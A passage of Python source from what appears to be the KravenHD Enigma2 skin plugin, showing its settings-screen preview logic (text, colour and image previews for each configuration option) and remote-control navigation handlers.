>>\")\n\n\t\t### version\n\t\tversionpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/version\"\n\t\tversionfile = open(versionpath, \"r\")\n\t\tfor line in versionfile:\n\t\t\tversion = line.rstrip()\n\t\t\tself[\"version\"].setText(version)\n\t\tversionfile.close()\n\n\t\t### preview\n\t\tself.showPreview()\n\n\tdef showPreview(self):\n\t\toption = self[\"config\"].getCurrent()[1]\n\n\t\tif option == config.plugins.KravenHD.customProfile:\n\t\t\tif config.plugins.KravenHD.customProfile.value==self.lastProfile:\n\t\t\t\tself.saveProfile(msg=False)\n\n\t\tif option.value == \"none\":\n\t\t\tself.showText(62, _(\"Off\"))\n\t\telif option.value == \"on\":\n\t\t\tself.showText(62, _(\"On\"))\n\t\telif option == config.plugins.KravenHD.customProfile:\n\t\t\tself.showText(23, \"/etc/enigma2/kravenhd_profile_\"+str(config.plugins.KravenHD.customProfile.value))\n\t\telif option == config.plugins.KravenHD.defaultProfile:\n\t\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/\"+str(config.plugins.KravenHD.defaultProfile.value)+\".jpg\"):\n\t\t\t\tself[\"helperimage\"].show()\n\t\t\telse:\n\t\t\t\tself.showText(23, \"/etc/enigma2/kravenhd_default_\"+str(config.plugins.KravenHD.defaultProfile.value))\n\t\telif option == config.plugins.KravenHD.TypeWriter:\n\t\t\tif option.value == \"runningtext\":\n\t\t\t\tself.showText(48, _(\"runningtext\"))\n\t\t\telif option.value == \"typewriter\":\n\t\t\t\tself.showText(48, _(\"typewriter\"))\n\t\telif option == config.plugins.KravenHD.RunningText:\n\t\t\tif option.value == \"startdelay=2000\":\n\t\t\t\tself.showText(50, _(\"2 sec\"))\n\t\t\telif option.value == \"startdelay=4000\":\n\t\t\t\tself.showText(50, _(\"4 sec\"))\n\t\t\telif option.value == \"startdelay=6000\":\n\t\t\t\tself.showText(50, _(\"6 sec\"))\n\t\t\telif option.value == \"startdelay=8000\":\n\t\t\t\tself.showText(50, _(\"8 
sec\"))\n\t\t\telif option.value == \"startdelay=10000\":\n\t\t\t\tself.showText(50, _(\"10 sec\"))\n\t\t\telif option.value == \"startdelay=15000\":\n\t\t\t\tself.showText(50, _(\"15 sec\"))\n\t\t\telif option.value == \"startdelay=20000\":\n\t\t\t\tself.showText(50, _(\"20 sec\"))\n\t\telif option == config.plugins.KravenHD.RunningTextSpeed:\n\t\t\tif option.value == \"steptime=200\":\n\t\t\t\tself.showText(50, _(\"5 px/sec\"))\n\t\t\telif option.value == \"steptime=100\":\n\t\t\t\tself.showText(50, _(\"10 px/sec\"))\n\t\t\telif option.value == \"steptime=66\":\n\t\t\t\tself.showText(50, _(\"15 px/sec\"))\n\t\t\telif option.value == \"steptime=50\":\n\t\t\t\tself.showText(50, _(\"20 px/sec\"))\n\t\telif option == config.plugins.KravenHD.RunningTextSpeed2:\n\t\t\tif option.value == \"steptime=200\":\n\t\t\t\tself.showText(62, _(\"5 px/sec\"))\n\t\t\telif option.value == \"steptime=100\":\n\t\t\t\tself.showText(62, _(\"10 px/sec\"))\n\t\t\telif option.value == \"steptime=50\":\n\t\t\t\tself.showText(62, _(\"20 px/sec\"))\n\t\t\telif option.value == \"steptime=33\":\n\t\t\t\tself.showText(62, _(\"30 px/sec\"))\n\t\telif option == config.plugins.KravenHD.Primetimeavailable:\n\t\t\tif option.value == \"primetime-on\":\n\t\t\t\tself.showText(62, _(\"On\"))\n\t\telif option == config.plugins.KravenHD.SkinResolution:\n\t\t\tif option.value == \"hd\":\n\t\t\t\tself.showText(54, _(\"HD \\n1280 x 720\"))\n\t\t\telif option.value == \"fhd\":\n\t\t\t\tself.showText(54, _(\"FHD \\n1920 x 1080\"))\n\t\telif option == config.plugins.KravenHD.PopupStyle:\n\t\t\tif option.value == \"popup-grad\":\n\t\t\t\tself.showText(30, _(\"gradient-style \\nwithout transparency \\nglobal background\"))\n\t\t\telif option.value == \"popup-grad-trans\":\n\t\t\t\tself.showText(30, _(\"gradient-style \\nwith transparency \\nglobal background\"))\n\t\t\telif option.value == \"popup-box\":\n\t\t\t\tself.showText(30, _(\"box-style \\nwithout transparency \\nglobal background \\nglobal border\"))\n\t\t\telif option.value == \"popup-box-trans\":\n\t\t\t\tself.showText(30, _(\"box-style \\nwith transparency \\nglobal background \\nglobal border\"))\n\t\telif option in (config.plugins.KravenHD.InfobarChannelName, config.plugins.KravenHD.InfobarChannelName2):\n\t\t\tif option.value == \"infobar-channelname-small\":\n\t\t\t\tself.showText(40, _(\"RTL\"))\n\t\t\telif option.value == \"infobar-channelname-number-small\":\n\t\t\t\tself.showText(40, _(\"5 - RTL\"))\n\t\t\telif option.value == \"infobar-channelname\":\n\t\t\t\tself.showText(76, _(\"RTL\"))\n\t\t\telif option.value == \"infobar-channelname-number\":\n\t\t\t\tself.showText(76, _(\"5 - RTL\"))\n\t\telif option in (config.plugins.KravenHD.ECMLine1, config.plugins.KravenHD.ECMLine2, config.plugins.KravenHD.ECMLine3):\n\t\t\tif option.value == \"VeryShortCaid\":\n\t\t\t\tself.showText(17, \"CAID - Time\")\n\t\t\telif option.value == \"VeryShortReader\":\n\t\t\t\tself.showText(17, \"Reader - Time\")\n\t\t\telif option.value == \"ShortReader\":\n\t\t\t\tself.showText(17, \"CAID - Reader - Time\")\n\t\t\telif option.value == \"Normal\":\n\t\t\t\tself.showText(17, \"CAID - Reader - Hops - Time\")\n\t\t\telif option.value == \"Long\":\n\t\t\t\tself.showText(17, \"CAID - System - Reader - Hops - Time\")\n\t\t\telif option.value == \"VeryLong\":\n\t\t\t\tself.showText(17, \"CAM - CAID - System - Reader - Hops - Time\")\n\t\telif option == config.plugins.KravenHD.FTA and option.value == \"FTAVisible\":\n\t\t\tself.showText(17, _(\"free to air\"))\n\t\telif option in 
(config.plugins.KravenHD.msn_searchby, config.plugins.KravenHD.msn_code, config.plugins.KravenHD.msn_cityname):\n\t\t\tself.showText(30,_(\"Weather-Code:\\n\") + config.plugins.KravenHD.msn_code.value)\n\t\telif option == config.plugins.KravenHD.msn_language:\n\t\t\tself.showText(30,_(\"Language\") + \":\\n\" + option.value)\n\t\telif option == config.plugins.KravenHD.refreshInterval:\n\t\t\tif option.value == \"15\":\n\t\t\t\tself.showText(50, \"00:15\")\n\t\t\telif option.value == \"30\":\n\t\t\t\tself.showText(50, \"00:30\")\n\t\t\telif option.value == \"60\":\n\t\t\t\tself.showText(50, \"01:00\")\n\t\t\telif option.value == \"120\":\n\t\t\t\tself.showText(50, \"02:00\")\n\t\t\telif option.value == \"240\":\n\t\t\t\tself.showText(50, \"04:00\")\n\t\t\telif option.value == \"480\":\n\t\t\t\tself.showText(50, \"08:00\")\n\t\telif option in (config.plugins.KravenHD.Infobox, config.plugins.KravenHD.Infobox2):\n\t\t\tif option.value == \"sat\":\n\t\t\t\tself.showText(50, \"19.2E S:99%\")\n\t\t\telif option.value == \"tunerinfo\":\n\t\t\t\tself.showText(50, \"19.2E DVB-S\")\n\t\t\telif option.value == \"cpu\":\n\t\t\t\tself.showText(50, \"19% L:0.47\")\n\t\t\telif option.value == \"temp\":\n\t\t\t\tself.showText(50, \"37°C U:1540\")\n\t\telif option == config.plugins.KravenHD.ChannelSelectionMode:\n\t\t\tif option.value == \"zap\":\n\t\t\t\tself.showText(50, \"1 x OK\")\n\t\t\telif option.value == \"preview\":\n\t\t\t\tself.showText(50, \"2 x OK\")\n\t\telif option == config.plugins.KravenHD.PVRState:\n\t\t\tif option.value == \"pvrstate-center-big\":\n\t\t\t\tself.showText(52, \">> 8x\")\n\t\t\telif option.value == \"pvrstate-center-small\":\n\t\t\t\tself.showText(32, \">> 8x\")\n\t\t\telse:\n\t\t\t\tself[\"helperimage\"].show()\n\t\telif option == config.plugins.KravenHD.ChannelSelectionEPGSize1:\n\t\t\tif config.plugins.KravenHD.ChannelSelectionEPGSize1.value == \"small\":\n\t\t\t\tself.showText(30, _(\"small\"))\n\t\t\telif config.plugins.KravenHD.ChannelSelectionEPGSize1.value == \"big\":\n\t\t\t\tself.showText(40, _(\"big\"))\n\t\telif option == config.plugins.KravenHD.ChannelSelectionEPGSize2:\n\t\t\tif config.plugins.KravenHD.ChannelSelectionEPGSize2.value == \"small\":\n\t\t\t\tself.showText(30, _(\"small\"))\n\t\t\telif config.plugins.KravenHD.ChannelSelectionEPGSize2.value == \"big\":\n\t\t\t\tself.showText(40, _(\"big\"))\n\t\telif option == config.plugins.KravenHD.ChannelSelectionEPGSize3:\n\t\t\tif config.plugins.KravenHD.ChannelSelectionEPGSize3.value == \"small\":\n\t\t\t\tself.showText(30, _(\"small\"))\n\t\t\telif config.plugins.KravenHD.ChannelSelectionEPGSize3.value == \"big\":\n\t\t\t\tself.showText(40, _(\"big\"))\n\t\telif option == config.plugins.KravenHD.GMEDescriptionSize:\n\t\t\tif config.plugins.KravenHD.GMEDescriptionSize.value == \"small\":\n\t\t\t\tself.showText(30, _(\"small\"))\n\t\t\telif config.plugins.KravenHD.GMEDescriptionSize.value == \"big\":\n\t\t\t\tself.showText(40, _(\"big\"))\n\t\telif option == config.plugins.KravenHD.IBFontSize:\n\t\t\tif config.plugins.KravenHD.IBFontSize.value == \"small\":\n\t\t\t\tself.showText(30, _(\"small\"))\n\t\t\telif config.plugins.KravenHD.IBFontSize.value == \"middle\":\n\t\t\t\tself.showText(35, _(\"middle\"))\n\t\t\telif config.plugins.KravenHD.IBFontSize.value == \"big\":\n\t\t\t\tself.showText(40, _(\"big\"))\n\t\telif option in (config.plugins.KravenHD.InfobarAntialias, config.plugins.KravenHD.ECMLineAntialias, config.plugins.KravenHD.ScreensAntialias):\n\t\t\tif option.value == 10:\n\t\t\t\tself.showText(50, 
\"+/- 0%\")\n\t\t\telif option.value in range(0, 10):\n\t\t\t\tself.showText(50, \"- \"+str(100-option.value*10)+\"%\")\n\t\t\telif option.value in range(11, 21):\n\t\t\t\tself.showText(50, \"+ \"+str(option.value*10-100)+\"%\")\n\t\telif option == config.plugins.KravenHD.DebugNames and option.value == \"screennames-on\":\n\t\t\tself.showText(50, \"Debug\")\n\t\telif option in (config.plugins.KravenHD.BackgroundColorTrans, config.plugins.KravenHD.InfobarColorTrans, config.plugins.KravenHD.ChannelSelectionTrans) and option.value == \"00\":\n\t\t\tself.showText(50, _(\"Off\"))\n\t\telif option == config.plugins.KravenHD.BackgroundListColor:\n\t\t\tif config.plugins.KravenHD.BackgroundListColor.value == \"gradient\":\n\t\t\t\tself.showGradient(config.plugins.KravenHD.BackgroundGradientColorPrimary.value, config.plugins.KravenHD.BackgroundGradientColorSecondary.value)\n\t\t\telif config.plugins.KravenHD.BackgroundListColor.value == \"texture\":\n\t\t\t\tself[\"helperimage\"].show()\n\t\t\telse:\n\t\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.BackgroundColor.value))\n\t\telif option == config.plugins.KravenHD.BackgroundGradientListColorPrimary:\n\t\t\tself.showGradient(config.plugins.KravenHD.BackgroundGradientColorPrimary.value, config.plugins.KravenHD.BackgroundGradientColorSecondary.value)\n\t\telif option == config.plugins.KravenHD.BackgroundGradientListColorSecondary:\n\t\t\tself.showGradient(config.plugins.KravenHD.BackgroundGradientColorPrimary.value, config.plugins.KravenHD.BackgroundGradientColorSecondary.value)\n\t\telif option == config.plugins.KravenHD.BackgroundAlternateListColor:\n\t\t\tself[\"helperimage\"].show()\n\t\telif option == config.plugins.KravenHD.SelectionStyle:\n\t\t\tif config.plugins.KravenHD.SelectionStyle.value == \"pixmap\":\n\t\t\t\tself.showGradient(config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value)\n\t\t\telse:\n\t\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.SelectionBackground.value))\n\t\telif option == config.plugins.KravenHD.SelectionBackgroundList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.SelectionBackground.value))\n\t\telif option == config.plugins.KravenHD.SelectionBackground2List:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.SelectionBackground2.value))\n\t\telif option == config.plugins.KravenHD.SelectionBorderList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.SelectionBorder.value))\n\t\telif option == config.plugins.KravenHD.IBProgressList:\n\t\t\tif config.plugins.KravenHD.IBProgressList.value == \"progress\":\n\t\t\t\tself[\"helperimage\"].show()\n\t\t\telse:\n\t\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.IBProgress.value))\n\t\telif option == config.plugins.KravenHD.IBProgressBackgroundList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.IBProgressBackground.value))\n\t\telif option == config.plugins.KravenHD.IBProgressBorderLine:\n\t\t\tif option.value == \"ib-progress-border\":\n\t\t\t\tself.showText(30, _(\"border \\nchoose the color below\"))\n\t\t\telif option.value == \"ib-progress-line\":\n\t\t\t\tself.showText(30, _(\"line \\nchoose the color below\"))\n\t\telif option == config.plugins.KravenHD.IBProgressBorderLineColorList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.IBProgressBorderLineColor.value))\n\t\telif option == config.plugins.KravenHD.EMCSelectionColors:\n\t\t\tif config.plugins.KravenHD.EMCSelectionColors.value == \"global\":\n\t\t\t\tif 
config.plugins.KravenHD.SelectionStyle.value == \"pixmap\":\n\t\t\t\t\tself.showGradient(config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value)\n\t\t\t\telse:\n\t\t\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.SelectionBackground.value))\n\t\t\telse:\n\t\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.EMCSelectionBackground.value))\n\t\telif option == config.plugins.KravenHD.EMCSelectionBackgroundList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.EMCSelectionBackground.value))\n\t\telif option == config.plugins.KravenHD.ProgressList:\n\t\t\tif config.plugins.KravenHD.ProgressList.value == \"progress\":\n\t\t\t\tself[\"helperimage\"].show()\n\t\t\telse:\n\t\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.Progress.value))\n\t\telif option == config.plugins.KravenHD.BorderList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.Border.value))\n\t\telif option == config.plugins.KravenHD.MiniTVBorderList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.MiniTVBorder.value))\n\t\telif option == config.plugins.KravenHD.AnalogColorList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.AnalogColor.value))\n\t\telif option == config.plugins.KravenHD.NZBorderList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.NZBorder.value))\n\t\telif option == config.plugins.KravenHD.GMEBorderList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.GMEBorder.value))\n\t\telif option == config.plugins.KravenHD.GMESelFgList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.GMESelFg.value))\n\t\telif option == config.plugins.KravenHD.GMESelBgList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.GMESelBg.value))\n\t\telif option == config.plugins.KravenHD.GMENowFgList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.GMENowFg.value))\n\t\telif option == config.plugins.KravenHD.GMENowBgList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.GMENowBg.value))\n\t\telif option == config.plugins.KravenHD.LineList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.Line.value))\n\t\telif option == config.plugins.KravenHD.Font1List:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.Font1.value))\n\t\telif option == config.plugins.KravenHD.Font2List:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.Font2.value))\n\t\telif option == config.plugins.KravenHD.IBFont1List:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.IBFont1.value))\n\t\telif option == config.plugins.KravenHD.IBFont2List:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.IBFont2.value))\n\t\telif option == config.plugins.KravenHD.PermanentClockFontList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.PermanentClockFont.value))\n\t\telif option == config.plugins.KravenHD.SelectionFontList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.SelectionFont.value))\n\t\telif option == config.plugins.KravenHD.EMCSelectionFontList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.EMCSelectionFont.value))\n\t\telif option == config.plugins.KravenHD.UnwatchedColorList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.UnwatchedColor.value))\n\t\telif option == config.plugins.KravenHD.WatchingColorList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.WatchingColor.value))\n\t\telif option == config.plugins.KravenHD.FinishedColorList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.FinishedColor.value))\n\t\telif 
option == config.plugins.KravenHD.MarkedFontList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.MarkedFont.value))\n\t\telif option == config.plugins.KravenHD.ButtonTextList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.ButtonText.value))\n\t\telif option == config.plugins.KravenHD.AndroidList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.Android.value))\n\t\telif option == config.plugins.KravenHD.Android2List:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.Android2.value))\n\t\telif option == config.plugins.KravenHD.ChannelSelectionServiceNAList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.ChannelSelectionServiceNA.value))\n\t\telif option == config.plugins.KravenHD.IBLine:\n\t\t\tself[\"helperimage\"].show()\n\t\telif option == config.plugins.KravenHD.InfobarGradientListColor:\n\t\t\tself[\"helperimage\"].show()\n\t\telif option == config.plugins.KravenHD.InfobarBoxListColor:\n\t\t\tself[\"helperimage\"].show()\n\t\telif option == config.plugins.KravenHD.InfobarGradientListColorPrimary:\n\t\t\tself[\"helperimage\"].show()\n\t\telif option == config.plugins.KravenHD.InfobarGradientListColorSecondary:\n\t\t\tself[\"helperimage\"].show()\n\t\telif option == config.plugins.KravenHD.InfoStyle:\n\t\t\tif config.plugins.KravenHD.InfoStyle.value == \"primary\":\n\t\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.InfobarGradientColorPrimary.value))\n\t\t\telif config.plugins.KravenHD.InfoStyle.value == \"secondary\":\n\t\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.InfobarGradientColorSecondary.value))\n\t\t\telse:\n\t\t\t\tself.showGradient(config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value)\n\t\telif option == config.plugins.KravenHD.InfobarAlternateListColor:\n\t\t\tself[\"helperimage\"].show()\n\t\telif option == config.plugins.KravenHD.ChannelnameFontList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.ChannelnameFont.value))\n\t\telif option == config.plugins.KravenHD.ECMFontList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.ECMFont.value))\n\t\telif option == config.plugins.KravenHD.PrimetimeFontList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.PrimetimeFont.value))\n\t\telif option == config.plugins.KravenHD.TunerBusyList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.TunerBusy.value))\n\t\telif option == config.plugins.KravenHD.TunerLiveList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.TunerLive.value))\n\t\telif option == config.plugins.KravenHD.TunerRecordList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.TunerRecord.value))\n\t\telif option == config.plugins.KravenHD.TunerXtremeBusyList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.TunerXtremeBusy.value))\n\t\telif option == config.plugins.KravenHD.MainmenuHorTitleFontList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.MainmenuHorTitleFont.value))\n\t\telif option == config.plugins.KravenHD.MainmenuHorIconColorList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.MainmenuHorIconColor.value))\n\t\telif option == config.plugins.KravenHD.ECMVisible:\n\t\t\tif option.value == \"0\":\n\t\t\t\tself.showText(36, _(\"Off\"))\n\t\t\telif option.value == \"ib\":\n\t\t\t\tself.showText(36, _(\"Infobar\"))\n\t\t\telif option.value == \"sib\":\n\t\t\t\tself.showText(36, \"SecondInfobar\")\n\t\t\telif option.value == \"ib+sib\":\n\t\t\t\tself.showText(36, _(\"Infobar & 
\\nSecondInfobar\"))\n\t\telse:\n\t\t\tself[\"helperimage\"].show()\n\n\tdef updateHelp(self):\n\t\tcur = self[\"config\"].getCurrent()\n\t\tif cur:\n\t\t\tself[\"help\"].text = cur[2]\n\n\tdef showRedText(self):\n\t\toption = self[\"config\"].getCurrent()[1]\n\t\tif option.value == \"auto-ip\" or option.value == \"location\" or option == config.plugins.KravenHD.msn_cityname:\n\t\t\tself[\"key_red\"].text = _(\"Search Code\")\n\t\telse:\n\t\t\tself[\"key_red\"].text = _(\"FAQs\")\n\n\tdef GetPicturePath(self):\n\t\ttry:\n\t\t\toptionValue = self[\"config\"].getCurrent()[1]\n\t\t\treturnValue = self[\"config\"].getCurrent()[1].value\n\t\t\tif optionValue == config.plugins.KravenHD.BackgroundListColor and config.plugins.KravenHD.BackgroundListColor.value == \"texture\":\n\t\t\t\tself.makeTexturePreview(config.plugins.KravenHD.BackgroundTexture.value)\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\"\n\t\t\telif optionValue == config.plugins.KravenHD.BackgroundTexture:\n\t\t\t\tself.makeTexturePreview(returnValue)\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\"\n\t\t\telif optionValue == config.plugins.KravenHD.InfobarTexture:\n\t\t\t\tself.makePreview()\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\"\n\t\t\telif optionValue == config.plugins.KravenHD.BackgroundAlternateListColor:\n\t\t\t\tself.makeAlternatePreview(config.plugins.KravenHD.BackgroundTexture.value, config.plugins.KravenHD.BackgroundAlternateColor.value)\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\"\n\t\t\telif optionValue == config.plugins.KravenHD.InfobarAlternateListColor:\n\t\t\t\tself.makeAlternatePreview(config.plugins.KravenHD.InfobarTexture.value, config.plugins.KravenHD.InfobarAlternateColor.value)\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\"\n\t\t\telif optionValue == config.plugins.KravenHD.IBStyle:\n\t\t\t\tself.makePreview()\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\"\n\t\t\telif optionValue == config.plugins.KravenHD.IBLineList:\n\t\t\t\tself.makePreview()\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\"\n\t\t\telif optionValue == config.plugins.KravenHD.InfobarGradientListColor:\n\t\t\t\tself.makePreview()\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\"\n\t\t\telif optionValue == config.plugins.KravenHD.InfobarBoxListColor:\n\t\t\t\tself.makePreview()\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\"\n\t\t\telif optionValue in (config.plugins.KravenHD.InfobarGradientListColorPrimary, config.plugins.KravenHD.InfobarGradientListColorSecondary):\n\t\t\t\tself.makePreview()\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\"\n\t\t\telif returnValue in (\"about\", \"about2\"):\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/about.png\"\n\t\t\telif returnValue == (\"meteo-light\"):\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/meteo.jpg\"\n\t\t\telif returnValue == \"progress\":\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/colorfull.jpg\"\n\t\t\telif returnValue in (\"self\", config.plugins.KravenHD.PermanentClock.value):\n\t\t\t\tpath = 
\"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/colors.jpg\"\n\t\t\telif returnValue == (\"channelselection-style-minitv3\"):\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/channelselection-style-minitv.jpg\"\n\t\t\telif returnValue == \"channelselection-style-nobile-minitv3\":\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/channelselection-style-nobile-minitv.jpg\"\n\t\t\telif returnValue == \"all-screens\":\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/emc-smallcover.jpg\"\n\t\t\telif returnValue == \"player-classic\":\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/clock-classic.jpg\"\n\t\t\telif returnValue == \"player-android\":\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/clock-android.jpg\"\n\t\t\telif returnValue == \"player-flip\":\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/clock-flip.jpg\"\n\t\t\telif returnValue == \"player-weather\":\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/clock-weather.jpg\"\n\t\t\telif returnValue == \"box\":\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/2.jpg\"\n\t\t\telif returnValue == \"grad\":\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/infobar-style-x2.jpg\"\n\t\t\telif returnValue == \"only-infobar\":\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/infobar-style-x3.jpg\"\n\t\t\telif returnValue in (\"0C\", \"18\", \"32\", \"58\", \"7E\"):\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/transparent.jpg\"\n\t\t\telif optionValue == config.plugins.KravenHD.KravenIconVPosition:\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/vposition.jpg\"\n\t\t\telif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/\" + returnValue + \".jpg\"):\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/\" + returnValue + \".jpg\"\n\t\t\tif fileExists(path):\n\t\t\t\treturn path\n\t\t\telse:\n\t\t\t\treturn \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/black.jpg\"\n\t\texcept:\n\t\t\treturn \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/fb.jpg\"\n\n\tdef UpdatePicture(self):\n\t\tself.PicLoad.PictureData.get().append(self.DecodePicture)\n\t\tself.onLayoutFinish.append(self.ShowPicture)\n\n\tdef ShowPicture(self):\n\t\tself.PicLoad.setPara([self[\"helperimage\"].instance.size().width(), self[\"helperimage\"].instance.size().height(), self.Scale[0], self.Scale[1], 0, 1, \"#00000000\"])\n\t\tif self.picPath is not None:\n\t\t\tself.picPath = None\n\t\t\tself.PicLoad.startDecode(self.picPath)\n\t\telse:\n\t\t\tself.PicLoad.startDecode(self.GetPicturePath())\n\n\tdef DecodePicture(self, PicInfo = \"\"):\n\t\tptr = self.PicLoad.getData()\n\t\tself[\"helperimage\"].instance.setPixmap(ptr)\n\n\tdef keyLeft(self):\n\t\tConfigListScreen.keyLeft(self)\n\t\tself.mylist()\n\n\tdef keyRight(self):\n\t\tConfigListScreen.keyRight(self)\n\t\tself.mylist()\n\n\tdef keyDown(self):\n\t\tself[\"config\"].instance.moveSelection(self[\"config\"].instance.moveDown)\n\t\tself.mylist()\n\n\tdef keyUp(self):\n\t\tself[\"config\"].instance.moveSelection(self[\"config\"].instance.moveUp)\n\t\tself.mylist()\n\n\tdef keyUpLong(self):\n\t\tself[\"config\"].instance.moveSelection(self[\"config\"].instance.moveUp)\n\t\tself.mylist()\n\n\tdef 
keyDownLong(self):\n\t\tself[\"config\"].instance.moveSelection(self[\"config\"].instance.moveDown)\n\t\tself.mylist()\n\n\tdef pageUp(self):\n\t\tself[\"config\"].instance.moveSelection(self[\"config\"].instance.pageUp)\n\t\tself.mylist()\n\n\tdef pageDown(self):\n\t\tself[\"config\"].instance.moveSelection(self[\"config\"].instance.pageDown)\n\t\tself.mylist()\n\n\tdef categoryDown(self):\n\t\tposition = self[\"config\"].instance.getCurrentIndex()\n\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\tif position == 0: # about\n\t\t\t\tself[\"config\"].instance.moveSelectionTo(163)\n\t\telse:\n\t\t\tif position == 0: # about\n\t\t\t\tself[\"config\"].instance.moveSelectionTo(168)\n\t\tif (2 <= position <= 4): # profiles\n\t\t\tself[\"config\"].instance.moveSelectionTo(0)\n\t\tif (6 <= position <= 17): # system\n\t\t\tself[\"config\"].instance.moveSelectionTo(3)\n\t\tif (18 <= position <= 35): # global colors\n\t\t\tself[\"config\"].instance.moveSelectionTo(7)\n\t\tif (36 <= position <= 53): # infobar-look\n\t\t\tself[\"config\"].instance.moveSelectionTo(19)\n\t\tif (54 <= position <= 64): # 